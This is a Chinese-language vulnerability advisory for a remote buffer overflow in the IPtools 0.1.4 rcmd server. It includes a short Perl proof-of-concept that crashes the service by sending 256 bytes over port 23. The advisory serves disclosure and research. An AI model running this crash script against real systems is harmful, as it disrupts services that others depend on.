IPtools远程命令服务器缓冲区溢出漏洞


发布日期:2012-01-06
更新日期:2012-10-16

受影响系统:
IPtools IPtools 0.1.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 51312

IPtools是小型的TCP/IP工具服务器。

IPtools 0.1.4及其他版本存在远程缓冲区溢出漏洞,成功利用后可允许远程攻击者在受影响应用中执行任意代码。

<*来源:demonalex
 
  链接:http://www.securityfocus.com/archive/1/521142
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#-------------------------------------------------------------
#!/usr/bin/perl -w
#IpTools(0.1.4) - Rcmd Remote Crash PoC by demonalex (at) 163 (dot) com [email concealed]
#-------------------------------------------------------------
use IO::Socket;
$remote_host = '127.0.0.1'; #victim ip as your wish
$remote_port = 23; #rcmd default port number
$sock = IO::Socket::INET->new(PeerAddr => $remote_host, PeerPort => $remote_port,
Timeout => 60) || die "$remote_host -> $remote_port is closed!\n";
$sock->recv($content, 1000, 0);
$count=0;
while($count<=255){
$sock->send("a", 0);
$count++;
}
$sock->send("\r\n", 0);
$sock->recv($content, 1000, 0);
$sock->shutdown(2);
exit(1);
#-------------------------------------------------------------

建议:
--------------------------------------------------------------------------------
厂商补丁:

IPtools
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://sourceforge.net/projects/iptools/

相关内容